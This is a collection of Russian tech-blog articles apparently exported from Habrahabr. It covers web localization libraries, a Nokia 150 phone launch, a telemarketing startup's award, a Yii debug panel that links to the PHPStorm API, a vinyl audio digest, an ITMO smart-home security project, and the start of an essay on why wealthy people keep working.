Особый интерес вызывает традиционная запись числительных в Китае. В китайском языке числа делятся на разряды иным образом, чем, например, в русском. Мы привыкли разбивать большие числа на группы по количеству тысяч, китайцы же — по количеству десятков тысяч. Например, число 150.000.000 будет ими записано как 1亿5000万. Кроме того, китайцы очень сильно верят в «числовые суеверия» и к нумерологии относятся серьезно и вдумчиво. Например, число 4 звучит аналогично слову «умереть», и китайцы стараются его избегать. Во многих гостиницах вы не найдете номеров с числом 4, а иногда даже и 4-го этажа. Тоже самое касается, например, банковских счетов: мечта простого китайца завести себе номер с восьмеркой — символом богатства и процветания.
Кроме того, проблемой может стать английская система мер, которая используется в США, Мьянме и Либерии. Почему это важно: стоит вспомнить спутник « Марс климат орбитер », который подлетел к Марсу и упал на него, так как команды на космическом оборудовании использовали силу в ньютонах, а программное обеспечение на Земле — фунт-силах. За все время полета никто не заподозрил ошибку. В итоге она стоила 125 млн долларов. Так что не забывайте отображать результаты в привычных для пользователей мерах.
Когда с форматом дат и чисел разобрались, можно переходить к особенностям переводов. И самая очевидная проблема — это склонение существительных после числительных. Как мы знаем, в русском языке существует три формы множественного числа (plural forms), в то же время в английском их всего две. Но существуют языки, в которых таких форм может быть шесть. Например, по этой ссылке вы найдете таблицу форм для каждого языка. Русский язык
Английский язык
У вас 1 подарок
Singular
You have 1 gift
У вас 5 подарков
Plural
You have 5 gifts
У вас 2 подарка
Few
Дальше можно выделить целый блок — особенности переводов. Здесь существует достаточное количество особенностей, которые нужно учитывать. 1. Переводить фразы и предложения целиком. Их нельзя делить на составляющие, так как последовательность слов в разных языках может быть разной.
Например, возьмем такую фразу: 8,283 out of 15,311 people liked you!
Для английского языка она выглядит следующим образом: <b>{{num_voters_yes_maybe}}</b> out of <b>{{num_voters_total}}</b> {{people}} liked you!
А вот в японском это же предложение уже выглядит иным образом: <b>{{num_voters_total}}</b>{{people}}<b>中{{num_voters_yes_maybe}}</b>人があなたを気に入っています!
Как видно из этого примера, в японском языке обратная последовательность слов. Поэтому, как часто многие делают, нельзя просто так написать 'Страница ' + pageNum + ' из ' + total 2. Некоторые переводы отличаются в зависимости от пола человека.
Как видно из примера ниже, если для английского языка можно указать одну фразу как для мужского, так и для женского пола, то в словацком языке для каждого пола будет своя фраза. Английский You got an award on <span>{{award_date}}</span> Словацкий М: Toto ocenenie si získal <span>{{award_date}}</span>
Ж: Toto ocenenie si získala <span>{{award_date}}</span> 3. Перевод строк должен зависеть от контекста. Переводчик должен знать смысл всего предложения, фразы или абзаца, иначе он может неправильно понять и некорректно перевести. Например, такое предложение как " You can save this {{item}} " может иметь различный перевод: « Вы можете спасти/сохранить этот {{item}}) ». В идеале переводчик не только должен видеть набор строк для перевода, но и изображение области, где данная строка находится. 4. Повторное использование ресурсов перевода может быть небезопасным. Например, «Сохранить» (файл) и «Сохранить» (настройки) в некоторых языках могут иметь разные названия. Или такое слово как thread может быть переведено как «поток», а может быть переведено как «нить».
Вот, пожалуй, мы определили наиболее популярные особенности, которые встречаются при локализации веб-приложений. Но это еще далеко не все, что может затрагивать локализация, потому что сюда можно отнести и особенности дизайна (например, японский и китайский требует увеличенного шрифта, в некоторых языках длина текста будет в 2 раза больше, чем, например, в английском); цветовую палитру (красный и зеленый цвет в разных культурах означают противоположные вещи, например, красная галочка в японском означает, что вы сделали что-то не так); используемые изображения (да-да, в Азии неплохо бы показывать азиатов, а в Европе — европейцев) и многие другие аспекты, которые характерны для той или иной страны и культуры. Все это выходит уже за рамки статьи, но об этом стоить помнить.
А теперь заглянем в интернет и посмотрим, а какие существуют инструменты для клиентской локализации ? Способы локализации на клиенте
Развитие интерфейсов и внедрение сложной бизнес-логики уже требовало от разработчиков решать многие проблемы локализации на клиенте. Возможности интернационализации, которые до определенного момента предоставлял ECMAScript, были достаточно скудными, поэтому стали появляться библиотеки, такие как Closure, Globalize, YUI, Moment.js или же какие-то собственные решения у каждого из разработчиков. Все они расширяли возможности ECMAScript и заполняли пробелы в интернационализации, но решения имели различный программный интерфейс и определенные ограничения, связанные, например, со сравнением строк. Так, в декабре 2012 года, появился стандарт ECMA-402 , который должен был упростить жизнь фронтенд-разработчикам при интернационализации приложений. Но действительно ли это так? Давайте посмотрим, что сейчас предлагает нам этот стандарт. ECMAScript Internationalization API
Это стандарт, который описывает программный интерфейс ECMAScript для адаптации к лингвистическим и культурным особенностям языков или стран. Работа происходит через объект Intl, который предоставляет функции форматирования чисел (Intl.NumberFormat), дат (Intl.DateTimeFormat) и сравнения строк (Intl.Collator). На данный момент поддерживается всеми современными браузерами. Последний браузер, который недавно добавил поддержку, был Safari, для устаревших браузеров можно использовать полифилл .
Большой плюс этого стандарта в том, что его разрабатывали при поддержке Google, Microsoft, Mozilla, Amazon, и, как нам обещают , он будет развиваться. Будут добавлены возможности форматирования строк с учетом форм множественного числа и пола, парсинг чисел и многое другое. Жаль, что происходит это все достаточно медленно. Например, сам стандарт был утвержден еще в 2013 году, а поддержка самыми популярными браузерами была реализована только в 2016. А пока что функционал объекта Intl достаточно ограничен и не предоставляет возможности для переводов. Поэтому приходится использовать сторонние решения или использовать полифилл для еще не утвержденного формата.
Плюсы: нативная реализация в браузере;
высокая производительность;
не требует загрузки дополнительных ресурсов;
форматирование строк с разными локалями без подгрузки JavaScript-ресурсов;
развитие стандарта ECMAScript 2017 Internationalization API.
Минусы: для устаревших браузеров необходима загрузка полифилла;
зависимость от системы. Некоторые локали могут не поддерживаться клиентом;
могут быть разные результаты в разных браузерах.
Примеры ECMAScript Internationalization API var mFormat = new Intl.NumberFormat("ru", {
style: "currency",
currency: "GBP"
}).format(1234567.93);
console.log(mFormat); // 1 234 567,93 £
var nFormat = new Intl.NumberFormat('ru-RU').format(1000.15);
console.log(nFormat); // "1 000,15"
var utc = new Intl.DateTimeFormat("en-US", {
timeZone: "utc",
hour: "numeric",
minute: "numeric"
});
console.log(utc.format(new Date())); // 2:38 PM
Чуть больше примеров можно посмотреть тут .
Как вы можете заметить, много чего еще в стандарте не реализовано, учтены не все особенности, с которыми сталкиваются разработчики веб-приложений. Поэтому, как я писал выше, многим приходится либо искать уже готовые решения, либо разрабатывать свои собственные. На данный момент решений достаточно много, и у каждого есть свои достоинства и недостатки. Если обратиться к Google, то при поиске в первых результатах будут i18next , FormatJS , Globalize , jQuery.i18n и другие. Некоторые из этих библиотек предлагают свои собственные решения, другие стараются идти по стандарту ECMA-402. Возьмем для примера две библиотеки, которые нам выдает в первых результатах в поиске Google и посмотрим, что они умеют. i18next
Как утверждает разработчик, это очень популярная библиотека для интернационализации как на клиенте, так и на сервере (node.js). Для нее существует множество плагинов, утилит, она интегрируется с разными фреймворками. Предоставляет интерфейс для переводчиков, в который вы можете загружать файлы переводов, но, к сожалению, он уже платный. В ней действительно много чего реализовано, и библиотека продолжает развиваться, что, конечно, радует. Но она не следует спецификации ECMA-402 и имеет свой структурный формат для сообщений, а не ICU Message syntax . Кроме того, для форматирования чисел и дат требуется загрузка moment.js или numeral.js . Соответственно, вам придется загрузить в проект еще и эти библиотеки и к ним добавить еще локали для нужных языков.
Плюсы: поддержка многих особенностей языка;
возможность загрузки ресурсов с бэкенда;
дополнительные плагины и различные утилиты;
расширения для популярных фреймворков, шаблонизаторов.
Минусы: требует загрузки ресурсов (i18next 35кб + moment 20кб + необходимые локали);
не следует стандарту ECMA-402;
платный интерфейс для переводчиков.
Более подробную информацию по работе с библиотекой и больше примеров можно найти на официальном сайте . Format JS
Format JS — это модульная коллекция JavaScript-библиотек для интернационализации. Она основывается на стандартах ECMA-402, ICU, CLDR и имеет интеграцию со множеством фреймворков и шаблонизаторов, например, такими как Dust, Ember, Handlebars. Данная библиотека при необходимости либо загружает полифилл для работы с интернационализацией, или же использует возможности браузера. Кроме того, она поддерживает работу как на клиенте, так и на сервере.
Плюсы: модульность;
использует возможности ECMA-402 или полифилл;
расширения для популярных фреймворков, шаблонизаторов.
Минусы: требует загрузки ресурсов при необходимости;
не все возможности для переводов.
Например, текст для перевода в ICU формате будет иметь такой вид: { gender, select,
female {{
count, plural,
=0 {У нее нет яблок}
one {У нее # яблоко}
few {У нее # яблока}
other {У нее # яблок}
}}
other {{
count, plural,
=0 {У него нет яблок}
one {У него # яблоко}
few {У него # яблока}
other {У него # яблок}
}}
}
Проверить работу можно по этой ссылке . Используйте пример выше и впишите локаль «ru». Формат, на первый взгляд, достаточно сложный, но позволяет учесть многие особенности языка. Единственное, я пока что не встречал удобных систем для переводчиков, которые работали бы с подобным форматом.
Как видно, решений существует достаточно много, вам нужно лишь выбрать. Но процесс локализации не заканчивается просто на выборе какой-то системы для локализации и попыткам справиться с различными особенностям языков. Любая система переводов должна быть тесно интегрирована в ваш процесс разработки, она должна представлять единую инфраструктуру как для разработчика, так и для переводчика, и ответить на несколько важных вопросов, например: как будет выглядеть процесс перевода?
как файлы переводов будут попадать к переводчикам и обратно в систему?
как узнать переводчику где находится конкретный текст?
И только тогда, когда у вас будут ответы и на эти вопросы, можно сказать, что вы имеете хорошо интегрированную систему локализации, удобную для работы.
На все эти вопросы и особенности языков нам пришлось обратить внимание, когда Badoo выходил на международный рынок. В те уже далекие времена, даже если похожие системы для локализации и существовали, то они не удовлетворяли всем нашим требованиям, и, само собой, нам пришлось разработать свою систему для локализации (о который мы уже писали на Хабре , а также рассказывали об особенностях верстки мультиязычных приложений). Данная система должна была хорошо интегрироваться в наш общий процесс, быть прозрачной и не задерживать процесс разработки (так как, например, мы «релизимся» два раза в день, и нам очень важно, чтобы новые продуктовые идеи быстро оказывались в продакшен-окружении). Кроме того, ей необходимо было иметь возможность работать не только с вебом, но и со всеми другими нашими платформами, такими как iOS, Android, Windows Phone, а также использоваться для email-рассылок.
С появлением общего формата общения между нашими клиентами и сервером (далее — протокол), или, как мы это называем, «апификацией», многие тексты стали приходить с сервера. Этот подход для нас оказался удобным, так как не надо хранить большие объемы переводов на клиенте и благодаря такому подходу мы, например, можем проводить AB-тестирование лексем или же создавать такие лексемы, которые зависят от действия пользователя. Каждый клиент также может хранить нужные переводы у себя. Решение, где хранить переводы — на клиенте или сервере, принимает команда, отвечающая за разработку протокола. Если какие-то переводы обновляются, то каждый клиент может запросить новые (так как переводы обновляются часто, а новые релизы появляются в магазинах приложений с определенной периодичностью). Такой механизм мы называем Hot Lexem update.
Как видно из рисунка выше, в процессе локализации у нас заняты не только клиентские разработчики и переводчики, но и множество других команд. Например, команда MAPI, как я писал выше, проектирует протокол и решает, где будут храниться переводы. Команда BackOffice предоставляет удобный интерфейс для переводчиков, переводчики, само собой, делают переводы, а команды SRV (серверные разработчики) или Frontend (клиентские разработчики) генерируют и отображают нужный перевод. Кроме того, когда мы создали такую систему, то на ее основе нам удалось создать коллоборативную систему переводов ( https://translate.badoo.com/ ), в которой могут участвовать и наши пользователи. И они очень помогают нам делать переводы с учетом местных особенностей каждой страны. Заключение
Совершенно понятно, что процесс локализации любого приложения — это достаточно серьезная и кропотливая работа, потому что она затрагивает разные команды проекта, а не только разработчиков и переводчиков. И в конце этой статьи я хочу еще раз обратить ваше внимание на основные, на мой взгляд, моменты при локализации приложений: Локализация — достаточно сложная процедура для внедрения «поверх». Если она вам понадобится, то должна быть заложена в проект с самого начала.
Ресурсы локализации должны быть независимыми от приложения.
Локализация распространяется не только на строки, и это тоже должно быть учтено при проектировании.
Сделайте вашу систему удобной не только для разработчиков, но и для переводчиков, автоматизируйте процесс переводов.
Если не уверены в качестве перевода, лучше вообще не переводите текст.
Старайтесь учитывать культурные особенности каждой страны и языка.
Дизайны, макеты, цветовая гамма, используемые изображения должны быть подвержены локализации.
Пожалуй, по этой теме у меня все. Надеюсь, что вы почерпнули для себя какие-то новые тонкости процесса локализации. Если же у вас есть свой интересный опыт, то поделитесь им и замечаниями в комментариях. Make web great again! Вячеслав Волков, frontend разработчик, Badoo | https://habrahabr.ru/company/badoo/blog/317484/ |
habrahabr | HMD Global представила новые телефоны Nokia 150 и Nokia 150 Dual SIM | ['Nokia', 'nokia 150', 'nokia 150 dual sim', 'мобильный телефон', 'кирпич', 'бренд', 'бюджетник'] |
Вчера компания HMD Global, которая выкупила права на бренд мобильных телефонов Nokia, представила публике два новых аппарата под этой маркой: Nokia 150 и Nokia 150 Dual SIM.
Оба продукта... |
Вчера компания HMD Global , которая выкупила права на бренд мобильных телефонов Nokia, представила публике два новых аппарата под этой маркой: Nokia 150 и Nokia 150 Dual SIM.
Оба продукта являются классическими кнопочными телефонами без сенсорного экрана и мощного железа.
Размеры устройства составляют 118x50,2x13,5 мм, вес — 81 грамм. Nokia 150 оснащена дисплеем на 2,4 дюйма с разрешением 320х240, 0,3-мегапиксельной камерой и фантастической для такого «малыша» съемной батареей на 1020 мАч (для сравнения новый iPhone 7 оснащен аккумулятором на 1960 мАч). Производитель заявляет 22 часа разговоров или 31 день в режиме ожидания и эти цифры более чем похожи на правду, так как потреблять энергию в новых Nokia банально нечему.
Управляется телефон ОС Series 30 , первые аппараты на которой выпускались Nokia еще в 2005 году. Из современных решений можно отметить поддержку флеш-памяти через разъем под microSD-карты с возможностью расширения до 32 Гб. В аппарате есть FM-приемник, а из новинок, относительно 2005 года, можно отметить еще и 3,5 мм разъем для наушников и поддержку CDMA (2,5G).
Ранее в СМИ появлялась информация, что новый владелец мобильного бренда Nokia выпустит под легендарной маркой смартфон под управлением Android. Пока же, по всей видимости, было принято решение подогреть интерес публики несколькими бюджетными решениям: рекомендуемая цена на Nokia 150 составляет 26 долларов. По сравнению с современными прожорливыми смартфонами, 22 часа разговора или 31 день в режиме ожидания выглядят как волшебство. Добавить к этому возможность использовать телефон в качестве MP3-плеера (без притязаний на ультра-качественный звук) или 32 Гб-флешки и мы получаем «кирпич», который за счет своей простоты, дешевизны и любви к бренду сможет найти своего покупателя. Старт продаж намечен на 1 квартал 2017 года. | https://geektimes.ru/post/283672/ |
habrahabr | Как случайно войти в 15 лучших IT проектов для бизнеса | ['телефонные скрипты', 'скрипты продаж', 'Цифровые вершины', 'КоллХелпер'] | Два года мы занимаемся своим сайд проектом для улучшения эффективности телемаркетинга. Четыре раза мы заявлялись на разные конкурсы, но не проходили даже в шорт-лист. Один раз не прошли в... | Два года мы занимаемся своим сайд проектом для улучшения эффективности телемаркетинга. Четыре раза мы заявлялись на разные конкурсы, но не проходили даже в шорт-лист. Один раз не прошли в акселератор. Два раза отказывали фонды. Правда, один раз крутой эксперт сказал, что мы правильно оцениваем рынок, но денег он пока не даст.
Почему-то рынок оптимизации телемаркетинга для малого и среднего бизнеса не воспринимается всерьез. Хотя эффективность телефонных коммуникаций компаний напрямую влияет на объем продаж.
К осени этого года мы уже скептически смотрели на любой конкурс, и «Цифровые вершины» поначалу уныло мелькнули в поле нашего зрения. Не обратил бы я на них внимания, если бы один из знакомых по Facebook не опубликовал, что будет там выступать. И следом пришла рассылка от сервиса Startpack.ru с рекомендацией все-таки попробовать свои силы. Мы подумали, «а вдруг?».
Время шло, ответа не было (чему мы понятное дело не удивились), и уже перед самым объявлением шорт листа в том же Facebook знакомого я возмутился, что ни ответа, ни привета по заявке не приходило и не понятно, принята ли она хотя бы. Оказалось, дело в банальной опечатке – не та почта в заявке. Спасибо организаторам, они тогда сами вышли на связь, оплошность была исправлена.
Читая через несколько дней письмо «Результаты отбора финалистов» мы открыли рты увидев себя в шорт листе, рядом с несколькими гораздо более обширными и зрелыми проектами, например Human Capital Management системой.
И вот, Москва, день питчей и выступлений. Тут же – вручение наград в номинациях. Вот «Вершины» получает Битрикс24, вот Мегаплан. У меня мысли только о том, что надо бы выглядеть уверенно и интересно рассказать о проекте. А вот уже и прямые конкуренты. Ну да, куда нам тягаться – много инструментов, большие корпоративные клиенты, десятки тысяч пользователей, но выступать надо. Реакция на мое выступление превзошла ожидания. Жюри заметно оживилось, задало пару вопросов, а один из экспертов произнес «Мне надо, сколько стоит?».
Буквально через десяток минут я уже стоял на сцене со статуэткой «Вершин» и не очень понимал, как это произошло. Жюри, как оказалось, тоже не очень понимало и приняло неожиданное изначально решение, даже не смотря на то, что мы заявились не совсем в свою целевую номинацию. «Это аванс, но вы его заработали» — фраза которая нас сейчас окрыляет на новые прорывы.
К чему я это: да, с первого взгляда к успеху привела цепочка случайностей, которых могло бы и не произойти. Но если копнуть глубже – все остальное было готово к тому, чтобы выстрелить.
Был конкретный прикладной продукт, отлично решающий узкие задачи, которые на данный момент не решает больше никто так же доступно и эффективно. Было понимание, что мы можем записать в свои реальные, уникальные и важные преимущества. Ну и конечно были действия – заявка, презентация, выступление. Не падайте духом, совершайте попытки, делайте дело, чтобы быть готовыми к случайности. P.S. – если у вас есть телемаркетинг, или еще нет, но нужен — заходите, пробуйте: http://callhelp.kit-media.com
Скоро мы выложим еще более эффективные инструменты, но уже сейчас вы найдете выгоды для своего телемаркетинга и отдела продаж.
И так как мы еще не писали ни разу после слияния Мегамозга — Хабровчане, какие темы по телемаркетингу и телефонным продажам вам интересны? | https://habrahabr.ru/company/callhelper_kitmedia/blog/317538/ |
habrahabr | Пример создания практичной Debug панели в Yii | ['yii 2', 'phpstorm', 'jetbrains', 'intellij idea', 'php', 'rest api'] | Написать свою Debug-панель в Yii очень просто. Поэтому рассмотрим чуть практичную (с вызовом api PHPStorm) панель просмотра вьюшек.
Есть подробно разжеванная документация, c примером вывода... | Написать свою Debug-панель в Yii очень просто. Поэтому рассмотрим чуть практичную (с вызовом api PHPStorm) панель просмотра вьюшек.
Есть подробно разжеванная документация, c примером вывода списка вьюшек. Давайте ее приведем в более практичный вид.
1. Уберем дубликаты.
2. Разделим въюшки для layouts, и основные.
3. Сделаем ссылку на Idea API.
Как известно когда мы кликаем на ссылку отображаемую функцией getSummary в «мини панели», отображается панель с контентом переданным функцией getDetail . Для краткости, ее код и приведу: public function getDetail()
{
$rootDir = Yii::getAlias('@app');
$rootDir = dirname($rootDir); //remove last dir
$viewsNormal = [];
$viewsLayout = [];
//$this->data = array_unique($this->data); //if delete duplicates
foreach ($this->data as $view) {
$viewFile = str_replace($rootDir.DIRECTORY_SEPARATOR, '', $view);
if (strpos($viewFile, 'layouts') !== false) {
$viewsLayout[$viewFile]++;
} else {
$viewsNormal[$viewFile]++;
}
}
//Display
$js = <<<JS
function _openIDE(elem){
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "http://localhost:63342/api/file?file=" + elem.innerHTML, true);
xmlhttp.send();
}
JS;
$content = "<script>$js</script>";
$content .= 'Views:<ol>';
foreach ($viewsNormal as $v => $count) {
$content .= '<li>' . $this->link2IDE($v) . ($count > 1 ? " ($count)" : '') . '</li>';
}
$content .= '</ol>';
$content .= '<hr>on layout:<ol>';
foreach ($viewsLayout as $v => $count) {
$content .= '<li>' . $this->link2IDE($v) . ($count > 1 ? " ($count)" : '') . '</li>';
}
$content .= '</ol>';
return $content;
}
Если сделать «стандартную ссылку»(вариант 1), открывается новое пустое окно в браузере. Поэтому сделана отдельная JS функция. private function link2IDE($linkFile) {
//Variant 1
//$port = '63342';
//return Html::a($linkFile, "http://localhost:$port/api/file?file=$linkFile&line=1", ['target' => '_top']);
//Variant 2
return "<a href='#' onclick='_openIDE(this);return false;'>$linkFile</a>";
}
Если вы не параноик постоянно выскакивающий запрос на разрешение напрягает, нужно включить галочку.
В итоге вот такая форма получилась, при клике на ссылку открывается первая строка въюшки в IDE(intellij, у меня IDEA, в PHPStorm тоже должно работать):
Предваряя возможные вопросы: Если порт занят (например RubyMine крутится): надо поменять порт в настройках IDE(картинка выше), и в коде.
Код отображения специально приведен в одной функции, для упрощения примера. Ее можно (и нужно) вынести в отдельную въюшку как обычно: return Yii::$app->view->render('@app/components/panels/views/auc/detail', [
'data' => $this->data,
]);
И да, я знаю что есть такая штука. Но судя по коменту уважаемого SamDark , когда пилили эту штуку, они не знали о api.
Если знаете куда переходить, то можно указывать строку и столбец явно: &line=97&column=52
PS: Сами мы не местные, поэтому прошу «профффтить и поннннять» , написать в личку об ошибках. | https://habrahabr.ru/post/317562/ |
habrahabr | Аудиодайджест #13: Винил — история, настройка и уход | ['аудиомания', 'аудиодайджест', 'винил'] | Помимо запуска нашей новой серии тематических материалов на тему того, «что нужно знать о современных аудиосистемах», и мы регулярно выпускаем новые серии аудиодайжеста — подборки полезных... | Помимо запуска нашей новой серии тематических материалов на тему того, « что нужно знать о современных аудиосистемах », и мы регулярно выпускаем новые серии аудиодайжеста — подборки полезных источников, руководств и обзоров на русском и английском.
В прошлом аудиодайжесте мы рассказывали о том, как собрать домашний кинотеатр , а в сегодняшнем выпуске решили поговорить о виниле и приятных мелочах, окружающих эту тему. / Виниловый проигрыватель TEAC TN-300 со встроенным фонокорректором История винила. Неувядающий звук Редакция портала iphones.ru разбирается с тем, как развивалась индустрия винила — от проигрывателей до форматов. Неплохая попытка понять, почему одним из самых востребованных носителей музыки долгое время оставалась виниловая пластинка, а появление «цифры» так и не сломало любовь слушателей к виниловому звуку. Лучшие проигрыватели винила XXI столетия От начала 2000-х до 2014 года. Журнал «WHAT HI-FI?» приводит свою версию списка лучших моделей, которые можно назвать удачной долговременной инвестицией. Лучшие бюджетные проигрыватели винила 2016 «WHAT HI-FI?» изучил популярность и порядок цен на лучшие предложения на рынке виниловых проигрывателей. Данный обзор хорошо подойдет для знакомства с темой и повышения класса своей самой первой системы путем обновления того или иного компонента. Краткое руководство по High End-аудио «АудиоМагазин» предложил хороший обзор компонентов аудиосистемы — от пластинки до звукоснимателя и тонарма. Речь и идет о функциональных особенностях и задачах, которые решают те или иные элементы системы. Виниловые хитрости Краткая заметка о том, как можно работать с объективными недостатками винила, связанными с износом и повреждениями. Подготовлена журналом «Stereo & Video». Как получить наилучший звук от проигрывателя винила Эксперты журнала «WHAT HI-FI?» дают рекомендации по выбору места для установки, выравниванию проигрывателя, настройке прижимной силы, высоты тонарма и ориентации картриджа, и разнице между MC- и MM-картриджами. Помощники в настройке винилового проигрывателя (часть 1) Чем чистить иглу и пластинки, как правильно установить проигрыватель и другой инструментарий виниловода. Речь идет о демонстрации функционала для того, чтобы любой мог разобраться и понять, нужна ли ему вообще такая штука, или нет. Помощники в настройке винилового проигрывателя (часть 2) В этой части обзора редакция «Stereo & Video» рассматривает клемпы, разнообразные маты, стробоскопы, приспособления для настройки проигрывателей и рассказывает о конвертах для хранения виниловых пластинок. Настройка винилового проигрывателя: Не ломайте иглы Эксперт «Stereo & Video» проанализировал основные ошибки, которые допускают любители винила — от геометрии установки головки и настройки тонарма до намертво затянутых винтов и скорости проигрывания. Конечно, помимо самих проблем есть и решения. Винил: Притворись его знатоком Тематический материал от «АудиоМагазина», в котором автор рассуждает о современных проигрывателях и коллекционных моделях. Уход и хранение виниловых пластинок У каждого владельца коллекции пластинок со временем возникает вопрос, как правильно за ними ухаживать и как их лучше хранить. Журнал «Stereo & Video» подготовил решения. Чистая музыка: Тест моющих средств для пластинок Четыре причины помыть пластинку, спирт или не спирт, эксперименты со средствами от Analog Renaissance и мат для фиксации пластинок. Обмоем: Или как мыть и чистить виниловые пластинки Что еще можно и нужно делать помимо уборки мелкой пыли перед прослушиванием, чистки иголки и мата проигрывателя. Как ухаживать за пластинками, рассказывает «Stereo & Video». Моющая машинка для винила Pro-Ject VC S Предназначена для очистки виниловых пластинок от загрязнений и имеет уникальную конструкцию, которая обеспечила ее эффективность и безопасность. Руководство по конвертации в цифровые файлы (Windows) В этом руководстве описана пошаговая процедура преобразования в цифровой звук 24/192. Среди прочего, приведены советы по устранению эффектов от щелчков, скачков и треска, которые могут снизить качество звучания. Как оцифровывать виниловые пластинки (часть 1) Знакомство с тем, что может понадобится для преобразования аудиоконтента на виниловой пластине винила в «цифру», в двух частях ( часть 2 ). Советы «WHAT HI-FI?» по оцифровке винила Базовые советы, которые позволят вам познакомится с темой, подобрать необходимые устройства и обратить внимание на определенные нюансы процесса. Наши другие подборки [ Аудиодайджест #12 ] [ #11 ] [ #10 ] [ #9 ] [ #8 ] [ #7 ] [ #6 ] [ #5 ] [ #4 ] [ #3 ] [ #2 ] [ #1 ] | https://geektimes.ru/company/audiomania/blog/283676/ |
habrahabr | Как защитить умный дом: Решение от команды Университета ИТМО | ['университет итмо', 'умный дом', 'smart home'] | Рынок систем умного дома развивается не так стремительно, как казалось еще несколько лет назад — в России встретить полностью автоматизированные дома можно довольно редко. Помимо сложности... | Рынок систем умного дома развивается не так стремительно, как казалось еще несколько лет назад — в России встретить полностью автоматизированные дома можно довольно редко. Помимо сложности внедрения и высокой стоимости, у таких систем наблюдается еще один недостаток — умный дом можно довольно легко взломать.
Сегодня мы поговорим о степени защищенности подобных систем и том, как можно сделать их безопаснее с помощью разработок, созданных в Университете ИТМО. Amir Zmora / Flickr / CC Что не так с умным домом
Часто разработчики не уделяют достаточного внимания безопасности создаваемых продуктов. Например, известен случай, когда исследователь информационной безопасности смог найти ссылку на интерфейс управления системой умного дома прямо в Google. Страница не была защищена паролем, так что он получил возможность управления всеми умными системами, а также узнал адрес дома и телефон его владельца.
Без проблем взломать умный дом можно и находясь прямо на месте. Как правило, при создании таких систем — особенно для жилых помещений — к существующей инфраструктуре просто «пристраивается» дополнительный уровень новых устройств. Новые гаджеты общаются между собой с помощью протоколов для беспроводного взаимодействия. И часто разработчики систем выбирают протоколы, которые не предполагают шифрования, так что перехватить данные может любой человек, подключившийся к сети помещения. Где слабое звено системы
В общем случае схема системы умного дома представляет собой два основных потока данных, в которых передаются управляющие сигналы: / Формальная модель системы «Умный дом». Иллюстрация из статьи «Аутентификация устройств автоматизации в системе «умный дом» авторов проекта «Безопасный умный дом»
Первый поток находится между пользователем и управляющей системой — в нем передаются команды от человека компьютеру. Для этого используется интерфейс: терминал, мобильное устройство, веб-приложение и т.п. Основной поток данных — второй, между управляющей системой и конечными устройствами автоматизации.
Устройства автоматизации, управляющая система и информационный поток между ними – одни из самых уязвимых элементов в «умном доме». Чаще всего в современных системах коммуникация между их элементами идет по открытым каналам без обеспечения конфиденциальности и целостности данных. В итоге злоумышленники могут без особенных проблем прослушивать информационные потоки системы, получать доступ к ее конкретным элементам и в некоторых случаях, захватывать полный контроль над помещениями. Как сделать умный дом безопаснее: проект Университета ИТМО
Именно на этот вопрос стремятся ответить участники проекта «Безопасный умный дом» — его развивает команда кафедры безопасных информационных технологий Университета ИТМО. Специалисты разрабатывают программно-аппаратный комплекс умного дома, который будет лишен основных минусов текущих систем.
Чтобы обезопасить систему, необходимо в первую очередь повысить защищенность всех описанных выше слабых звеньев. Например, выбрать безопасный способ передачи данных. Команда проекта провела анализ применяемых в подобных системах протоколов связи — по результатам этой работы выяснилось, что с точки зрения основных характеристик наилучшим выбором для таких систем является технология Zig-Bee. Этот протокол позволяет максимально повысить конфиденциальность, целостность и доступность данных.
Кроме того, система должна правильно реагировать на возможные атаки. Атакующий может не только перехватывать данные, но и попытаться физически вмешаться в работу устройств системы, например отключить их. В таком случае другие устройства должны заметить аномалию в виде недоступного первого гаджета. / Схема воздействия на устройства системы «Умный дом». Иллюстрация из статьи «Выявление аномалий в системах автоматизации объектов охраны» авторов проекта «Безопасный умный дом»
Любая попытка атаки влияет на характеристики системы умного дома — значит их необходимо анализировать. Если два устройства проводят мониторинг активности сети и выполняют анализ взаимодействия, то скрыть атаку вроде MITM или replay взломщик не сможет.
Для решения этой задачи участники проекта «Безопасный умный дом» разработали гибридную нейронную сеть, объединяющую две модели искусственных нейронных сетей: самоорганизующуюся сеть с конкуренцией (слой Кохонена) и многослойный персептрон.
После обучения искусственная нейронная сеть способна на основании входящих данных выносить решения о принадлежности текущего состояния узла сети к аномальному или обычному с точностью в 91,47%. Подробнее о работе над нейронной сетью, использующейся в проекте, можно прочитать здесь .
Для реализации аутентификации на стороне конечного гаджета используется решение на базе Arduino Uno с подключенным Ethernet контроллером enc28j60. Этот микроконтроллер поддерживает большое количество внешних устройств, так что может быть универсальным звеном для организации взаимодействия с разными элементами автоматизации. Подробнее архитектура системы описана в этой статье . Заключение
Команда кафедры безопасных информационных технологий Университета ИТМО развивает проект «Безопасный умный дом» с 2015 года. За это время была разработана архитектура программно-аппаратного модуля, написан необходимый софт и выбраны безопасные протоколы передачи данных. Итоговый результат позволяет серьезно снизить применимость основных атак на системы умного дома: / Результаты проверки основных типов сетевых атак до и после встраивания устройства защиты. Иллюстрация из статьи «Аутентификация устройств автоматизации в системе «умный дом» авторов проекта «Безопасный умный дом»
Гибкость созданной безопасной умной сети позволяет объединять в ней практически любые устройства и безопасно передавать данные. Поэтому в будущем ее использование возможно не только в жилых объектах, но и на промышленных.
Дополнительные материалы по теме: Автоматизация устройств аутентификации
Анализ рисков систем умного дома
Обеспечение безопасной аутентификации устройств умного дома
Анализ протоколов передачи данных для разработки безопасных автоматизированных систем на примере умного дома
| https://habrahabr.ru/company/spbifmo/blog/317454/ |
habrahabr | Почему человек, разбогатев, продолжает работать — выясняем причину и следствие | ['работа в ит', 'финансы', 'зарплата и удовольствие', 'человек и деньги'] |
Многие обеспеченные люди после того, как получили капитал, позволяющий безбедно жить в течение многих лет, продолжали работать и дальше. Некоторые на какое-то время прекращали работу, начинали... |
Многие обеспеченные люди после того, как получили капитал, позволяющий безбедно жить в течение многих лет, продолжали работать и дальше. Некоторые на какое-то время прекращали работу, начинали веселую и беззаботную жизнь, но затем снова начинали трудиться — в той же сфере, где удалось заработать много денег или в иной.
У большинства не слишком обеспеченных людей это вызывает недоумение — ведь зачем работать, если у тебя и так все хорошо, и не нужно думать о завтрашнем дне? На самом деле причина для продолжения трудовой деятельности есть и стимул этот довольно мощный.
В качестве примера можно привести случай с одним из предпринимателей Кремниевой долины. Когда его компания, в которой он трудился, вышла на IPO, предприниматель за одну ночь разбогател. Как акционер, он получил от компании десятки миллионов долларов США, которые позволяли ему забыть о превратностях судьбы на очень долгое время. Причем сам он был уверен, что работать уже никогда не будет.
